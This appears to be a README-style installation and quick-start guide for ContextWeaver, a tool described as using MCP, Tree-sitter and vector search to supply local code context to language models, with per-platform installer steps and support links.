ContextWeaver is a tool that helps you use local code libraries with ease. It works based on the MCP protocol, using Tree-sitter and vector search to provide intelligent context weaving and retrieval for large language models. Follow the steps below to get started.
Before you install ContextWeaver, make sure your computer meets the following requirements:
- Operating System: Windows, macOS, or Linux
- Processor: Dual-core 2.0 GHz or faster
- Memory: 4 GB RAM or more
- Hard Disk Space: At least 100 MB free space
- Network Connection: Required for initial setup and updates
To download the application, visit the Releases page:
- Click on the βReleasesβ link above.
- On the Releases page, find the latest version of ContextWeaver.
- Look for the installation file that matches your operating system. It will have an appropriate file extension:
.exefor Windows.dmgfor macOS.AppImagefor Linux
- Click on the file to download it to your computer.
- Once the download completes, locate the file in your Downloads folder.
- Double-click the
.exefile you downloaded. - Follow the on-screen instructions in the installation wizard.
- Once installation finishes, you can find ContextWeaver in your Start Menu.
- Double-click the
.dmgfile you downloaded. - Drag the ContextWeaver app into your Applications folder.
- You can now open ContextWeaver from your Applications.
- Make the
.AppImagefile executable. You can do this by right-clicking the file, selecting "Properties," and then checking the "Allow executing file as program" box. - Double-click the file to run the application.
- You can create a shortcut for easier access.
Locate ContextWeaver on your computer and double-click to open it.
You will see the option to choose a project directory. Navigate to the folder containing your code files and select it.
After selecting the project, ContextWeaver will analyze your code. This may take a few moments, depending on the project size. Once done, you can start querying your codebase for information.
- Smart Retrieval: Ask questions about your code, and ContextWeaver provides intelligent answers using local context.
- Code Suggestions: Get suggestions based on the current file you are editing.
For additional help, visit the GitHub Wiki to access comprehensive documentation. Here you will find guides, FAQs, and troubleshooting tips.
Join our community discussions to share your experiences and ask questions. Engage with other users and contribute to improving ContextWeaver.
With ContextWeaver, managing and retrieving local code contexts becomes straightforward. Simply follow this guide to download, install, and start using the application. Enjoy seamless access to your code!